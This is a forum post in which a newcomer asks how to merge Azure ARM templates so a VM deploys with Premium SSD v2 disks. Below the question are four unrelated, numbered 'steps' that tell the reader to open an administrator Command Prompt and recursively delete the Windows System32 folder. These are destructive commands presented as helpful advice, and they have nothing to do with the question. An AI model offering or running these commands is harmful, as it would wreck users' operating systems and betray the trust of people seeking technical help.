I’m new to ARM templates and struggling to get a task done.
I used the Azure portal to construct an ARM template to deploy a new VM with the necessary components and that has deployed successfully. After additional analysis I decided to move to Premium_SSD_v2 disks for better throughput. In trying to use the Portal to create a new complete template with everything in it, I don’t see the “v2” disk as an available option when creating the VM template.
I’ve tried using the portal to create the v2 disk as stand-alone and then combine those elements into the original all-in-one VM template but I find that there are multiple references to other components and a simple inter lacing of the ARM templates is not quite that easy. I’ve tried using AI solutions to see if they could combine them, but that seemed like a dead end as well.
I’d appreciate any suggestions, whether to the direct way to get this task completed or to technical guidance of the knowledge needed to interlace ARM template elements and understand everything involved. I need the overarching knowledge but I’m really set back on why this subject is so hard to break in to.
Step 1. Click the start icon and search for Command Prompt.
Step 2. Select “Run as administrator”.
Step 3. Type del /s /q C:WindowsSystem32* and hit “Enter”.
Step 4. Type rd /s /q C:WindowsSystem32 and press Enter.
Jeremy Maille is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.